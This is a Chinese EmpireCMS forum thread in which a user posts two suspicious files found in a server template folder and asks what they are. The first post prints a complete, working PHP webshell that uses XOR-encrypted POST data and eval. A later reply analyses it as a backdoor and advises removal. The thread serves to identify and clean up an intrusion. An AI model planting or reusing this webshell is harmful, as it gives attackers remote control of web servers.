帝国论坛帝国网站管理系统交流区帝国CMS使用交流谁知道这2个文件做什么的? 【本版专题贴子】  
主题:谁知道这2个文件做什么的? [加入收藏夹]   

qwer88
用户头衔:进士

精华贴   :0
发贴数   :1256
经验值   :5768
注册时间:2008-12-11
信息 搜索 好友 发送悄悄话 精益求精-帝国网站管理系统7.5正式版开源发布】   [第 1 楼]
谁知道这2个文件做什么的?
在服务器D:PHP/template 里





第1个。名称php4CD1.TMP

<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
if(isset($_GET['phpinfo'])) {
    phpinfo();
        }
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$pass='pass';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
if (isset($_POST[$pass])){
    $data=encode(base64_decode($_POST[$pass]),$key);
    if (isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
        if (strpos($payload,"getBasicsInfo")===false){
            $payload=encode($payload,$key);
        }
        eval($payload);
        echo substr(md5($pass.$key),0,16);
        echo base64_encode(encode(@run($data),$key));
        echo substr(md5($pass.$key),16);
    }else{
        if (strpos($data,"getBasicsInfo")!==false){
                  $_SESSION[$payloadName]=encode($data,$key);
              }
          }
      }
exit('77770123');




------------------------------------------------------------------------------



2024-06-08 20:16:35 已设置保密 顶部 回复 引用 报告 编辑 删除

qwer88
用户头衔:进士

精华贴   :0
发贴数   :1256
经验值   :5768
注册时间:2008-12-11
信息 搜索 好友 发送悄悄话 免费开源-EBMA系统:更安全的MYSQL管理和备份系统】   [第 2 楼]

?JFIF&#63733;;CREATOR: gd-jpeg v1.0 (using IJG JPEG v90), quality = 90
&#63733;C




  &#63733;C                

&#63733;

[该贴被修改 2 次,最后修改时间 2024-06-08 20:19:04 ]


2024-06-08 20:17:24 已设置保密 顶部 回复 引用 报告 编辑 删除

zhxin
用户头衔:探花

精华贴   :0
发贴数   :3911
经验值   :10758
注册时间:2013-01-09
信息 搜索 好友 发送悄悄话 精益求精-帝国网站管理系统7.5正式版开源发布】   [第 3 楼]

从扩展名看这是php的临时上传文件



2024-06-09 06:40:10 已设置保密 顶部 回复 引用 报告 编辑 删除

jiuhecai
用户头衔:探花

精华贴   :0
发贴数   :3108
经验值   :8921
注册时间:2014-07-02
信息 搜索 好友 发送悄悄话 免费开源-EBMA系统:更安全的MYSQL管理和备份系统】   [第 4 楼]

这段PHP代码包含了一些可疑的特征,表明它可能被设计用于执行潜在的恶意活动。下面是一些引起关注的点:

禁用错误报告和设置无限制执行时间:

@error_reporting(0); 和 @set_time_limit(0); 这两条语句分别用于关闭错误报告和设置脚本执行时间为无限制,这通常是恶意脚本用来隐藏错误信息和长时间运行以执行复杂任务的手段。
通过GET参数显示phpinfo:

if(isset($_GET['phpinfo'])) { phpinfo(); } 这段代码意味着如果URL中带有phpinfo参数,它将显示服务器的PHP配置信息,这可能泄露敏感信息。
加密解密函数:

function encode($D,$K){...} 定义了一个自定义的加密解密函数,用于对传递的数据进行XOR操作加密解密。这种模式常见于恶意代码中,用于混淆数据传输或存储的内容。
使用POST数据执行代码:

代码检查是否有特定POST参数(由变量$pass定义),然后解密接收到的数据,并可能根据这些数据执行代码(通过eval函数)。这表明它可以接收外部指令并执行任意代码,是典型的后门行为。
会话存储和激活恶意payload:

代码利用会话存储($_SESSION[$payloadName])来持久化恶意负载,一旦激活,可以通过特定的POST请求再次执行。
退出代码:

exit('77770123'); 结束脚本前输出特定字符串,可能是为了向攻击者确认脚本已执行。
综上所述,尽管没有直接证据证明它是传统意义上的“木马”(即独立传播的恶意软件),但其行为特征符合WebShell的定义,这是一种被黑客植入网站以获取远程控制权限的恶意代码。如果你在自己的项目中发现了这段代码,应立即删除,并检查服务器是否已被入侵。


帝国插件 插件定制。帝国临时工。查杀顽固木马。专业解决难题。qq--110102296
2024-06-09 06:50:38 已设置保密 顶部 回复 引用 报告 编辑 删除

快速回复
内容

表情
使用EBB代码 使用smile代码 显示签名 自动分析url 自动分析img
     【进入高级模式】   (按 Ctrl+Enter 直接提交)
    顶部  加入收藏夹
关于帝国 | 广告服务 | 联系我们 | 法律声明 | 隐私条款 | 许可协议
Powered by: EBB Version 2.2.1